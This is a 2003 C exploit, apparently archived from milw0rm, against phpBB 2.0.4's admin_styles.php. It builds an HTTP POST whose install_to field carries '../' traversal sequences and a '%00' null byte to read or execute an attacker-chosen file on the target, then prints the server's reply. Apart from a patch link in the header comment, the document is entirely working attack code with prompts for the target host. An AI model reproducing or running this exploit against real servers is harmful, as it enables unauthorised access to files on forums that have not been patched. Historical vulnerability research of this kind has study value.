phpBB 2.0.4 - PHP Remote File Inclusion

1. /***********************************************************/
2. /* phpBB 2.0.4 Remote Admin_Styles.PHP Theme_Info.CFG File Include  */
3. /*                                                                                                    */
4. /*                Exploit made on June 2003 by Spoofed Existence               */
5. /*                                                                                                    */
6. /*       Patch : http://www.phpbb.com/phpBB/viewtopic.php?t=113826      */
7. /***********************************************************/
8.  
9. #include <stdio.h>
10. #include <sys/types.h>
11. #include <sys/socket.h>
12. #include <netinet/in.h>
13. #include <netdb.h>
14.  
15. int main()
16. {
17.  //The socket stuff
18.  struct hostent *hp;
19.  struct sockaddr_in sa;
20.  int sock;
21.  
22.  //The input stuff
23.  char server[100];
24.  char location[100];
25.  char sfile[100];
26.  int escapes;
27.  char* file;
28.  
29.  //The request stuff
30.  char* request;
31.  char* postdata;
32.  char* header;
33.  
34.  //The buffer to store the response
35.  char buffer[4096];
36.  int tworeturns = 0;
37.  int showing = 0;
38.  
39.  //Other
40.  int i;
41.  
42.  //Ask the server
43.  printf("Server: ");
44.  scanf("%100s", server);
45.  printf("Forum location: ");
46.  scanf("%100s", location);
47.  printf("Directories to escape: ");
48.  scanf("%i", &escapes);
49.  printf("File to get/execute: ");
50.  scanf("%100s", sfile);
51.  
52.  
53.  //Start the exploit!
54.  printf("\n\nStarting the exploit...\n");
55.  
56.  //Connect to the server
57.  printf("Creating socket... ");
58.  if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
59.  {
60.   printf("Failed!\n");
61.   return 0;
62.  } else{ printf("Done!\n");
63.  }
64.  
65.  
66.  printf("Looking up server IP... ");
67.  if((hp = gethostbyname((char*)server)) == NULL)
68.  {
69.   printf("Failed!\n");
70.   return 0;
71.  } else { printf("Done!\n");
72.  }
73.  
74.  
75.  printf("Connecting %s:80... ", server);
76.  memcpy(&sa.sin_addr, hp->h_addr_list[0], hp->h_length);
77.  sa.sin_family = AF_INET;
78.  sa.sin_port = htons(80);
79.  if(connect(sock, (struct sockaddr*)&sa, sizeof(sa)))
80.  {
81.   printf("Failed!\n");
82.   return 0;
83.  } else { printf("Done!\n");
84.  }
85.  
86.  
87.  //Create the request
88.  printf("Building request... ");
89.  
90.  //Create the postdata
91.  file = (char*)malloc(sizeof(char) * (escapes * 3 + strlen(sfile) + 1));
92.  
93.  while(escapes > 0)
94.  {
95.   if(escapes == 1)
96.   {
97.    sprintf(file, "%s%s%s", file, "..", sfile);
98.   } else { sprintf(file, "%s%s", file, "../");
99.   }
100.  
101.   escapes --;
102.  }
103.  
104.  postdata = (char*)malloc((27 + strlen(file)) * sizeof(char));
105.  sprintf(postdata, "send_file= &install_to=%s%s00", file, "%");
106.  
107.  header = (char*)malloc((170 + strlen(server) + strlen(location)) *
108. sizeof(char));
109.  sprintf(header, "POST /%s/admin/admin_styles.php?mode=addnew
110. HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost:
111. %s\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", location, server,
112. strlen(postdata));
113.  
114.  request = (char*)malloc((strlen(postdata) + strlen(header) + 1) *
115. sizeof(char));
116.  sprintf(request, "%s%s", header, postdata);
117.  
118.  printf("Done!\n");
119.  
120.  
121.  //Send the request
122.  printf("Sending request... ");
123.  write(sock, request, strlen(request));
124.  printf("Done!\n");
125.  
126.  printf("\nResponse:\n");
127.  //Get the response
128.  while(recv(sock, buffer, 4096, 0) != 0)
129.  {
130.   for(i = 0; i < strlen(buffer); i++)
131.   {
132.    //Only show the character when it should
133.    if(showing == 1)
134.    {
135.     printf("%c", buffer[ i ]);
136.    }
137.  
138.  
139.    //Stop showing from \n<br>\n
140.    if(buffer[ i ] == '\n' && buffer[i + 1] == '<' && buffer[i + 2] == 'b' &&
141. buffer[i + 3] == 'r' && buffer[i + 4] == '>' && buffer[i + 5] == '\n' &&
142. showing == 1)
143.    {
144.     showing = 0;
145.     tworeturns = 0;
146.    }
147.    //Or from \n<br />\n
148.    if(buffer[ i ] == '\n' && buffer[i + 1] == '<' && buffer[i + 2] == 'b' &&
149. buffer[i + 3] == 'r' && buffer[i + 4] == ' ' && buffer[i + 5] == '/' &&
150. buffer[i + 6] == '>' && buffer[i + 7] == '\n' && showing == 1)
151.    {
152.     showing = 0;
153.     tworeturns = 0;
154.    }
155.  
156.    //If there's a return and tworeturns = true, start showing it
157.    if(buffer[ i ] == '\n' && tworeturns == 1)
158.    {
159.     showing = 1;
160.    }
161.  
162.    //If there are two returns, set tworeturns to true and add 3 to i
163.    if(buffer[ i ] == '\r' && buffer[i + 1] == '\n' && buffer[i + 2] == '\r'
164. && buffer[i + 3] == '\n')
165.    {
166.     tworeturns = 1;
167.     i += 3;
168.    }
169.   }
170.  }
171.  printf("\n");
172.  
173.  return 0;
174. }
175.  
176. // milw0rm.com [2003-06-30]
177.